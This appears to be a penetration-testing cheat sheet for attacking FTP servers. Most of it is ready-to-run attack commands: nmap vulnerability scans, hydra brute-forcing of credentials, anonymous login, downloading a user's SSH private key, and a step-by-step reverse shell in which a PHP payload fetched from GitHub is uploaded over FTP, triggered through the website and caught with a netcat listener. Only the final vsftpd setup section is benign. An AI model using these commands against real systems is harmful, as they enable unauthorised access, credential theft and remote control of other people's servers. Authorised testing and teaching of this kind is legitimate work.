FTP (File Transfer Protocol) Pentesting
Last modified: 2023-02-11
FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).
Enumeration
nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>
Brute Force Credentials
hydra -l username -P passwords.txt <target-ip> ftp
hydra -L username.txt -p password <target-ip> ftp
hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>
Investigation
Banner Grabbing
nc <target-ip> 21
Using OpenSSL
First off, open listener.
nc -vn <target-ip> 21
Then run the command below.
openssl s_client -connect <target-ip>:21 -starttls ftp
Connect
ftp <target-ip>
ftp <target-ip> <target-port>
Sometimes we might be able to the anonymous login.
Not likely, but worth a try.
ftp <target-ip>
username: anonymous
password: anonymous
Commands in FTP
After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.
The FTP commands are almost the same as Linux commands.
ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -
# Switch to passive mode.
ftp> passive
# Print usage
ftp> ?
Transfer Files
To transfer files to local machine,
ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa
# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample
Reverse Shell over Website
If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell.
-
Download the Payload
Get the payload for the reverse shell from this repository.
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php # -------------------------------------------------------------------------------- # Edit some variables in shell.php $ip = '<your-local-ip>'; $port = 1234;
-
Upload the Payload to FTP Directory
Connect to FTP and upload the payload.
ftp <target-ip> # Upload the payload you downloaded ftp> put shell.php
-
Get a Shell
At first, w need to open listener in your local machine.
nc -lvnp 1234
In a web browser, access to "http://vulnerable.com/path/to/ftp/shell.php".
We should get a target shell.
Start FTP Server
1. Install vsftpd
sudp apt install vsftpd
To check the config file for vsftpd, run the following command.
less /etc/vsftpd.conf
2. Start FTP Server
Below are commands for starting FTP server and checking the status.
sudo systemctl start vsftpd
sudo systemctl status vsftpd
If you’ve updated the config file, you need to restart vsftpd.
sudo systemctl restart vsftpd